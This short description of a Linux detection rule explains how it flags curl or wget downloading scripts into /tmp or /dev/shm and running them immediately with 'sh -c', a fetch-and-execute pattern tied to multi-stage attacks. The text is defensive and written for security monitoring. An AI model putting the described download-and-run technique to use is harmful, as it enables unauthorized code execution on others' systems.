This rule detects a suspicious pattern associated with the use of command-line tools such as `curl` and `wget` for downloading remote content, specifically targeting Linux systems. The detection focuses on instances where these tools are used to retrieve scripts or executables to temporary directories like `/tmp` or `/dev/shm`, followed by immediate execution through shell commands (`sh -c`). This pattern is indicative of fileless or multi-stage attack techniques employed by malicious actors to execute unauthorized code while avoiding traditional file-based detection methods. Given the nature of these command-line tools, their use in quick succession with downloads and executions in temporary directories is commonly associated with malware, stagers, or other attack vectors that exploit scripting capabilities in Linux environments. The rule is designed to mitigate risks from such actions by alerting security teams when these specific command patterns are detected in process creation logs, thus necessitating investigation to discern intentional authorized activity from potential threats.